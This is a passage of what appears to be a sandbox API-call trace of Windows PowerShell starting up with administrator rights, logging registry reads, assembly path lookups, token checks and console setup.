	[0474.959] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadc4c, lpData=0x0, lpcbData=0xadc48*=0x0 | out: lpType=0xadc4c*=0x1, lpData=0x0, lpcbData=0xadc48*=0x56) returned 0x0
	[0474.960] CoTaskMemAlloc (cb=0x5a) returned 0x227ed0
	[0474.960] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadc1c, lpData=0x227ed0, lpcbData=0xadc18*=0x56 | out: lpType=0xadc1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xadc18*=0x56) returned 0x0
	[0474.960] CoTaskMemFree (pv=0x227ed0) 
	[0474.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.117] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0476.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.117] CoTaskMemFree (pv=0x19ae70) 
	[0479.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0479.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0480.499] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0480.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.482] CoTaskMemFree (pv=0x19af80) 
	[0481.483] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0481.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.483] CoTaskMemFree (pv=0x19af80) 
	[0481.515] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0481.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.515] CoTaskMemFree (pv=0x19af80) 
	[0481.517] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0481.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.517] CoTaskMemFree (pv=0x19af80) 
	[0481.517] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0481.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.517] CoTaskMemFree (pv=0x19af80) 
	[0484.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0484.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0484.874] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0484.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.874] CoTaskMemFree (pv=0x19af80) 
	[0484.877] CoTaskMemAlloc (cb=0x104) returned 0x19af80
	[0484.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19af80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.877] CoTaskMemFree (pv=0x19af80) 
	[0485.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0485.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0490.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0492.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0492.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0495.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0495.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0498.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0498.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0499.652] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0499.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0499.652] CoTaskMemFree (pv=0x19b1a0) 
	[0499.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0499.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0499.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0499.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0501.038] SetErrorMode (uMode=0x1) returned 0x1
	[0501.038] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xadbe0 | out: lpFileInformation=0xadbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0501.038] SetErrorMode (uMode=0x1) returned 0x1
	[0504.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.473] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0504.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.473] CoTaskMemFree (pv=0x19b1a0) 
	[0504.476] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0504.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.476] CoTaskMemFree (pv=0x19b1a0) 
	[0504.477] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0504.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.477] CoTaskMemFree (pv=0x19b1a0) 
	[0504.945] CoCreateGuid (in: pguid=0xadfa8 | out: pguid=0xadfa8*(Data1=0x97a14493, Data2=0x5bd6, Data3=0x4492, Data4=([0]=0xaf, [1]=0xf1, [2]=0xa3, [3]=0x15, [4]=0xf5, [5]=0xd9, [6]=0xfb, [7]=0xff))) returned 0x0
	[0504.948] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0504.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.949] CoTaskMemFree (pv=0x19b1a0) 
	[0504.951] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0504.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.951] CoTaskMemFree (pv=0x19b1a0) 
	[0504.954] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0504.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.954] CoTaskMemFree (pv=0x19b1a0) 
	[0504.961] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0504.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xadc50 | out: lpConsoleScreenBufferInfo=0xadc50) returned 1
	[0504.971] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0504.971] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xadc50 | out: lpConsoleScreenBufferInfo=0xadc50) returned 1
	[0504.972] GetVersionExW (in: lpVersionInformation=0xadbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0504.975] GetCurrentProcess () returned 0xffffffffffffffff
	[0504.976] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xadc78 | out: TokenHandle=0xadc78*=0x1c0) returned 1
	[0504.980] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xadb98 | out: TokenInformation=0x0, ReturnLength=0xadb98) returned 0
	[0504.981] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a7290
	[0504.981] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x1a7290, TokenInformationLength=0x4, ReturnLength=0xadb98 | out: TokenInformation=0x1a7290, ReturnLength=0xadb98) returned 1
	[0504.981] DuplicateTokenEx (in: hExistingToken=0x1c0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xadcf8 | out: phNewToken=0xadcf8*=0x1c4) returned 1
	[0508.965] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xadb98 | out: TokenInformation=0x0, ReturnLength=0xadb98) returned 0
	[0508.965] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a72c0
	[0508.965] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x8, TokenInformation=0x1a72c0, TokenInformationLength=0x4, ReturnLength=0xadb98 | out: TokenInformation=0x1a72c0, ReturnLength=0xadb98) returned 1
	[0508.966] CheckTokenMembership (in: TokenHandle=0x1c4, SidToCheck=0x2d80528*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xadd08 | out: IsMember=0xadd08) returned 1
	[0508.966] CloseHandle (hObject=0x1c4) returned 1
	[0509.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.726] CoTaskMemAlloc (cb=0x804) returned 0x1b8e8880
	[0509.726] GetConsoleTitleW (in: lpConsoleTitle=0x1b8e8880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0509.727] CoTaskMemFree (pv=0x1b8e8880) 
	[0510.487] CoTaskMemAlloc (cb=0x804) returned 0x1b8e9130
	[0510.487] GetConsoleTitleW (in: lpConsoleTitle=0x1b8e9130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0510.487] CoTaskMemFree (pv=0x1b8e9130) 
	[0510.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0510.489] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0512.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0512.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
